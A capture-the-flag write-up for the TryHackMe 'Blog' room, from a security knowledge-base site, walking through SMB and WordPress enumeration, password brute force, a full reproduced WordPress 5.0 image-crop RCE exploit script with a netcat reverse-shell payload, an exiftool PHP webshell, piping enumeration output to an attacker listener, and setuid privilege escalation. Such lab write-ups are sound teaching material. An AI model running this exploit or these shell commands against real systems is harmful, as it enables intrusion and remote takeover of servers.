Knowledge Bank
  • 🔭About Us
    • 👋Welcome to Securescape!
  • 👶Fundamentals
    • 🖥️Operating Systems (WIP)
      • Introduction to Operating Systems
      • Processes and Process Management
        • 📠Processes
        • 🧵Threads
        • 📅Scheduling
      • Memory Management
        • Virtual Memory Management
      • Storage Management
      • I/O Management
    • 🐧Linux (WIP)
      • Introduction to Linux
      • Linux System Management
    • ⚡Programming (WIP)
      • 🔗Assembly
      • 💪C(++/#)
      • 🐍Python
      • 👑Nim
      • 🔨Bash
        • Introduction to Bash Scripting
        • Variables, Loops, and Port Scanner
    • 🚩Networking (WIP)
      • 📶Networking 101
        • 🕸️Networking Basics
        • 🛑Protocols
        • 🧓IPv4
        • 🧒IPv6
      • 🪡Packet Tracer
        • Interface
        • Connections
        • Creating Networks
        • Virtual LANS & Trunks
      • 🕸️Subnetting
      • 🕵️Network Security
    • ✍️Report Writing (WIP)
      • 🔍Research Skills
      • 🏗️Structuring a Report
      • 🗃️Creating Templates
  • 🦂General Security
    • 🗒️Methodologies
      • 🇭🇰OSSTMM
      • 🐝OWASP
        • Web Security Testing Guide
        • Mobile Security Testing Guide
      • 🦅NIST
      • 🥢PTES
      • ⛓️Cyber Killchain
    • 🍔Binary Exploitation
      • ir0nstone's Binary Exploitation Notes
    • 🎩Cheat Sheets
      • Enumeration
        • Network Scan
        • Vulnerability Scan
        • Web Scan
      • Exploitation
        • Page 1
        • Payloads & Shells
      • Post Exploitation
        • Lay of The Land
        • Persistence
        • Data Exfiltration
        • Pivoting
      • Command & Control
      • Disassembly
        • ☢️Radare2
        • 🥜GDB
      • CEH Cheatsheet
  • ⚔️Offensive Security
    • 💡Hardware Exploitation
      • Intro to Hardware
    • 🥷Red Team
      • 🦠Malware Development
        • Crow Malware Development
        • 🪡C# Malware
      • 🏭Offensive Development
        • 🔧Offensive DevOps
          • 🏷️GitLab
            • GitLab Setup
            • Simple Calculator Project
            • Making our CI/CD Pipeline
            • Build Artifacts
          • 🌆TeamCity
            • TeamCity Setup
            • Creating TeamCity Projects
            • Obfuscating Payloads
          • 🍷Jenkins (WIP)
            • Jenkins Setup
            • Creating Pipelines
            • Managing Projects
            • API Interaction
        • 🏗️Infrastructure Development (WIP)
          • 🎮Command & Control Infrastructure
            • 🤖Command & Control Anatomy
              • Command & Control Frameworks
              • Ⓜ️Metasploit Framework
                • Installing Metasploit
                • Metasploit Basics
                • Advanced Features
                • Metasploit Documentation
              • 🐲Mythic Framework
                • Installing Mythic
                • Malleable Command & Control
                • All About Agents
                • Services
                • Mythic Documentation
            • 🚥Traffic Redirection
              • Nginx
              • Amazon Web Services
              • Microsoft Azure
              • Google Cloud Platform
              • Cloudflare Workers
            • 🥷Covert Infrastructure
              • Ensuring Resiliency
              • Traffic Masking
              • Network Rules
          • 🎣Phishing Infrastructure
            • 📧Email Anatomy
            • 🐟Phishing Infrastructure Setup
            • 🚚Payload Delivery
            • 🚩Removing Red Flags
          • 🪄Infrastructure as Code
            • 🏝️Terraform
              • Interacting with Docker
              • Going to the Cloud
              • Hybrid Deployment
            • 🧊Pulumi
            • 🎼Ansible
          • ⚙️Infrastructure Automation
            • 🦴Structuring our Project
            • 🏭Automating Server Setups
            • 🎼Orchestrating our Infrastructure
            • 🔧CI/CD Integration
      • 🏙️Active Directory (WIP)
        • Active Directory Overview
        • Authentication
        • AD Lab
      • Red Team Operations - Joas Santos
  • 🛡️Defensive Security
  • 📻Software Defined Radios
    • ⚠️Disclaimer
    • 📡Baofeng
      • Programming
  • 🧑‍🔬Home Lab
    • 💨Virtualisation
      • 🔸Proxmox
  • 🏁Capture The Flag
    • 🧊HackTheBox
      • 👾Cyber Apocalypse
        • Cyber Apocalypse 2023
    • 🐤TryHackMe
      • 🎄Advent of Code
      • 🚪Rooms
        • 🐥Basic Pentesting
        • 👨‍💻Blog
      • 👟Paths
    • 🏳️Competitions
      • Nahamcon
        • Nahamcon 2023
          • Binary Exploitation
            • Open Sesame
      • 👁️Iris CTF
  • 🦺DRAFTS
    • GS
      • 📱Mobile Application Security
      • 👨‍🔬Reverse Engineering
      • 🌐Web Application Security
      • 📌Information Security
      • 🔒Cryptography
      • 🤫Operational Security
    • DS
      • 🧠Threat Intelligence
        • 🦌ELK Stack
          • 🤸Elasticsearch
          • 🏕️Kibana
          • 🦤SELKS
        • 🚓Yara
      • 🏹Threat Hunting
      • 🧬Malware Analysis
        • Fundamentals
      • 🔬Forensics
        • 📶Network Forensics
          • 🦈Wireshark
          • 🥟TCP Dump
        • 💾Memory Forensics
          • ⚡Volatility
        • 💽Disk Forensics
          • 🐕Autopsy
        • 🪟Windows Forensics
        • 🐧Linux Forensics
      • 🌲Security Operations
        • Intrusion Detection & Prevention
          • 🐛Splunk
            • Splunk Basics
            • Integrating Suricata with Splunk
          • 🐗Suricata
            • Intro to Suricata
          • 🐽Snort
            • Snort Basics
        • Security Information and Event Management (SIEM)
        • Security Orchestration, Automation and Response (SOAR)
    • HL
      • 🖥️Hardware
    • OS
      • 📶Network Exploitation
      • 🌩️Cloud Exploitation
Powered by GitBook
On this page
  • Enumeration
  • Exploitation

Was this helpful?

Edit on GitHub
  1. Capture The Flag
  2. TryHackMe
  3. Rooms

Blog

Billy Joel made a blog on his home computer and has started working on it.  It's going to be so awesome!

Enumerate this box and find the 2 flags that are hiding on it!  Billy has some weird things going on his laptop.  Can you maneuver around and get what you need?  Or will you fall down the rabbit hole...

In order to get the blog to work with AWS, you'll need to add blog.thm to your /etc/hosts file.

Enumeration

nmap -T4 -A -Pn blog.thm -vvv

PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3hfvTN6e0P9PLtkjW4dy+6vpFSh1PwKRZrML7ArPzhx1yVxBP7kxeIt3lX/qJWpxyhlsQwoLx8KDYdpOZlX5Br1PskO6H66P+AwPMYwooSq24qC/Gxg4NX9MsH/lzoKnrgLDUaAqGS5ugLw6biXITEVbxrjBNdvrT1uFR9sq+Yuc1JbkF8dxMF51tiQF35g0Nqo+UhjmJJg73S/VI9oQtYzd2GnQC8uQxE8Vf4lZpo6ZkvTDQ7om3t/cvsnNCgwX28/TRcJ53unRPmos13iwIcuvtfKlrP5qIY75YvU4U9nmy3+tjqfB1e5CESMxKjKesH0IJTRhEjAyxjQ1HUINP
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJtovk1nbfTPnc/1GUqCcdh8XLsFpDxKYJd96BdYGPjEEdZGPKXv5uHnseNe1SzvLZBoYz7KNpPVQ8uShudDnOI=
|   256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICfVpt7khg8YIghnTYjU1VgqdsCRVz7f1Mi4o4Z45df8
80/tcp  open  http        syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 0s, deviation: 1s, median: -1s
| nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BLOG<00>             Flags: <unique><active>
|   BLOG<03>             Flags: <unique><active>
|   BLOG<20>             Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: blog
|   NetBIOS computer name: BLOG\x00
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2023-02-03T17:13:18+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-02-03T17:13:18
|_  start_date: N/A

SMB

smbclient -L //blog.thm/

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	BillySMB        Disk      Billy\'s local SMB Share
	IPC$            IPC       IPC Service (blog server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

smbclient //blog.thm/BillySMB
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue May 26 19:17:05 2020
  ..                                  D        0  Tue May 26 18:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 19:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 19:13:45 2020
  check-this.png                      N     3082  Tue May 26 19:13:43 2020

		15413192 blocks of size 1024. 9788692 blocks available
smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (16.1 KiloBytes/sec) (average 16.1 KiloBytes/sec)
smb: \> get check-this.png
getting file \check-this.png of size 3082 as check-this.png (1.9 KiloBytes/sec) (average 9.9 KiloBytes/sec)
smb: \> get tswift.mp4
getting file \tswift.mp4 of size 1236733 as tswift.mp4 (228.3 KiloBytes/sec) (average 139.7 KiloBytes/sec)
smb: \> exit

Website

Users

Hovering over the author names we can get their usernames which can potentially be used to bruteforce into the website.

kwheel
bjoel

WPScan

wpscan --url http://blog.thm/ --usernames 'kwheel' -P /usr/share/wordlists/rockyou.txt

[SUCCESS] - khweel / ███████

We managed to get into wp-admin by bruteforcing the login. Let's see what we can do from here

Exploitation

Getting a Shell

# Exploit Title: WordPress 5.0.0 - Image Remote Code Execution
# Date: 2020-02-01
# Exploit Authors: OUSSAMA RAHALI ( aka V0lck3r)
# Discovery Author : RIPSTECH Technology
# Version: WordPress 5.0.0 and <= 4.9.8 .
# References : CVE-2019-89242 | CVE-2019-89242  | https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/

#/usr/bin/env python3

import requests
import re
import sys
from datetime import datetime

banner = """

__        __            _                           ____   ____ _____ 
\ \      / /__  _ __ __| |_ __  _ __ ___  ___ ___  |  _ \ / ___| ____|
 \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| | |_) | |   |  _|  
  \ V  V / (_) | | | (_| | |_) | | |  __/\__ \__ \ |  _ <| |___| |___ 
   \_/\_/ \___/|_|  \__,_| .__/|_|  \___||___/___/ |_| \_\\____|_____|
                         |_|                                        
                         			5.0.0 and <= 4.9.8
"""
print(banner)
print("usage :")
print("=======")
usage = 'python3 RCE_wordpress.py http://<IP>:<PORT>/ <Username> <Password> <WordPress_theme>'
print(usage)

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
wp_theme = sys.argv[4] # wpscan results

lhost = '10.10.10.10' #attacker ip
lport = '4141' #listening port

date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/'

imagename = 'gd.jpg'
# ======
# Note :
# ======
# It could be any jpg image, BUT there are some modifications first : 
# 1- image name as : "gd.jpg"
# 2- place the image in the same directory as this exploit.
# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="<?=\`\$_GET[0]\`?>"

data = {
	'log':username,
	'pwd':password,
	'wp-submit':'Log In',
	'redirect_to':url+'wp-admin/',
	'testcookie':1
}

r = requests.post(url+'wp-login.php',data=data)

if r.status_code == 200:
	print("[+] Login successful.\n")
else:
	print("[-] Failed to login.")
	exit(0)

cookies = r.cookies

print("[+] Getting Wp Nonce ... ")

res = requests.get(url+'wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)

if len(wp_nonce_list) == 0 :
	print("[-] Failed to retrieve the _wpnonce \n")
	exit(0)
else :
	wp_nonce = wp_nonce_list[0]
	print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n")

print("[+] Uploading the image ... ")

data = {
	'name': 'gd.jpg',
	'action': 'upload-attachment',
	'_wpnonce': wp_nonce
}

image = {'async-upload': (imagename, open(imagename, 'rb'))}
r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies)
if r_upload.status_code == 200:
	image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
	_wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
	print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n")
else : 
	print("[-] Failed to receive a response for uploaded image ! try again . \n")
	exit(0)

print("[+] Changing the path ... ")


data = {
	'_wpnonce':_wp_nonce,
	'action':'editpost',
	'post_ID':image_id,
	'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali'
}

res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies)
if res.status_code == 200:
	print("[+] Path has been changed successfully. \n")
else :
	print("[-] Failed to change the path ! Make sure the theme is correcte .\n")
	exit(0)

print("[+] Getting Ajax nonce ... ")

data = {
	'action':'query-attachments',
	'post_id':0,
	'query[item]':43,
	'query[orderby]':'date',
	'query[order]':'DESC',
	'query[posts_per_page]':40,
	'query[paged]':1
}

res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies)
ajax_nonce_list=re.findall(r',"edit":"(\w+)"',res.text)

if res.status_code == 200 and len(ajax_nonce_list) != 0 :
	ajax_nonce = ajax_nonce_list[0]
	print('[+] Ajax Nonce retrieved successfully ! ajax_nonce : '+ ajax_nonce+'\n')
else :
	print("[-] Failed to retrieve ajax_nonce.\n")
	exit(0)


print("[+] Cropping the uploaded image ... ")

data = {
	'action':'crop-image',
	'_ajax_nonce':ajax_nonce,
	'id':image_id,
	'cropDetails[x1]':0,
	'cropDetails[y1]':0,
	'cropDetails[width]':200,
	'cropDetails[height]':100,
	'cropDetails[dst_width]':200,
	'cropDetails[dst_height]':100
}

res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies)
if res.status_code == 200:
	print("[+] Done . \n")
else :
	print("[-] Erorr ! Try again \n")
	exit(0)

print("[+] Creating a new post to include the image... ")

res = requests.post(url+'wp-admin/post-new.php', cookies=cookies)
if res.status_code == 200:
	_wpnonce = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)[0]
	post_id = re.findall(r'"post":{"id":(\w+),',res.text)[0]
	print("[+] Post created successfully . \n")
else :
	print("[-] Erorr ! Try again \n")
	exit(0)

data={
	'_wpnonce':_wpnonce,
	'action':'editpost',
	'post_ID':post_id,
	'post_title':'RCE poc by v0lck3r',
	'post_name':'RCE poc by v0lck3r',
	'meta_input[_wp_page_template]':'cropped-rahali.jpg'
}
res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies)
if res.status_code == 200:
	print("[+] POC is ready at : "+url+'?p='+post_id+'&0=id\n')
	print("[+] Executing payload !")
	requests.get(f"{url}?p={post_id}&0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20{lhost}%20{lport}%20%3E%2Ftmp%2Ff",cookies=cookies)

else :
	print("[-] Error ! Try again (maybe change the payload) \n")
	exit(0)

python3 exploit.py http://blog.thm:80/ kwheel <PASSWORD> twentytwenty

We first have to make a jpg and inject it with a payload:

curl https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTePwCC0g8ZGjII2IWJNvb9XtEyxXW6lLRW50api4SI&s --output gd.jpg

exiftool gd.jpg -CopyrightNotice="<?=\`\$_GET[0]\`?>"

# Dont forget to change the IP and Port from the POC to point to your machine.
nc -lvnp 4141
python3 exploit.py http://blog.thm/ kwheel <PASSWORD> twentytwenty


__        __            _                           ____   ____ _____ 
\ \      / /__  _ __ __| |_ __  _ __ ___  ___ ___  |  _ \ / ___| ____|
 \ \ /\ / / _ \| '__/ _` | '_ \| ''__/ _ \/ __/ __| | |_) | |   |  _|  
  \ V  V / (_) | | | (_| | |_) | | |  __/\__ \__ \ |  _ <| |___| |___ 
   \_/\_/ \___/|_|  \__,_| .__/|_|  \___||___/___/ |_| \_\____|_____|
                         |_|                                        
                         			5.0.0 and <= 4.9.8

usage :
=======
python3 RCE_wordpress.py http://<IP>:<PORT>/ <Username> <Password> <WordPress_theme>
[+] Login successful.

[+] Getting Wp Nonce ... 
[+] Wp Nonce retrieved successfully ! _wpnonce : 826668b4dc

[+] Uploading the image ... 
[+] Image uploaded successfully ! Image ID :38

[+] Changing the path ... 
[+] Path has been changed successfully. 

[+] Getting Ajax nonce ... 
[+] Ajax Nonce retrieved successfully ! ajax_nonce : 80738d1e9d

[+] Cropping the uploaded image ... 
[+] Done . 

[+] Creatng a new post to include the image... 
[+] Post created successfully . 

[+] POC is ready at : http://blog.thm:80/?p=42&0=id

[+] Executing payload !

If this does not work for you then use metasploit

msf6 exploit(multi/http/wp_crop_rce) > options

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   PASSWORD         yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.145.223    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THEME_DIR                   no        The WordPress theme dir name (disable theme auto-detection if provided)
   USERNAME   kwheel           yes       The WordPress username to authenticate with
   VHOST      blog.thm         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.2.5.193       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress
# Searching the /var/wordpress directory
ls 

VAxzgJRLgC.php
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php

$> cat wp-config.php

<..SNIP..>
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', '<BJOELPASSWORD>');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/** Custom FS Method */
define('FS_METHOD', 'direct');
<..SNIP..>

We have credentials to go to the bjoel wordpress account now:

bjoel:BJOELPASSWORD

Elevating Permissions

Let us start by running linpeas to enumerate possible privesc paths:

python3 -m http.server 8080
nc -lvnp 4444 | tee linpeas.log # Starts a listener then outputs the results to a file

# Victim:
curl $IP:8080/linpeas.sh | sh | nc $IP 4444
# Replace $IP with your IP Address

Findings

                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. Yes
═╣ AWS Lambda? .......................... No

╔══════════╣ AWS EC2 Enumeration
ami-id: ami-08a5de7340156b07d
instance-action: none
instance-id: i-0666034230f46a9f1
instance-life-cycle: on-demand
instance-type: t2.micro
region: eu-west-1
# Attacker
wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
## Tab 1
python3 -m http.server 8080
## Tab 2
nc -lvnp 4444 | tee lse.log

# Victim
curl $IP:8080/lse.sh | bash | nc $IP 4444

####

============================================================( file system )=====
[*] fst000 Writable files outside user\'s home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!
---

/usr/sbin/checker
file checker
checker: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6cdb17533a6e02b838336bfe9791b5d57e1e2eea, not stripped

./checker 
Not an Admin

Examining the file under Radare shows this:

Basically:

If user is admin -> /bin/bash
else -> Not an Admin -> Exit

Admin is not an actual linux environment variable, we can exploit this by adding our own variable by doing export admin=admin

We can see that no errors are generated this time. Let's try this on machine:

pwd
	/usr/sbin
./checker
	Not an Admin
export admin=admin
./checker
whoami
	root

There's our privesc :)

As for the user flag - we can see from the termination letter that he uses USBs (naughty)

Let's check /media/usb

cd /media
ls
usb
cd usb
ls
user.txt

There we go!

Note: You'll probably find the Root flag before User, don't panic if you dont manage to find the user after foothold cause the USB has Root only permissions

PreviousBasic PentestingNextPaths

Last updated 2 years ago

Was this helpful?

Searching for Wordpress 5.0 Exploits gives us tool which we can try

Couldn't find more with linpeas so I'll switch to

Let's look up checker on - Nothing... Let's download it instead and examine it further:

🏁
🐤
🚪
👨‍💻
this
Linux Smart Enumeration
GTFOBins
WP Editor Page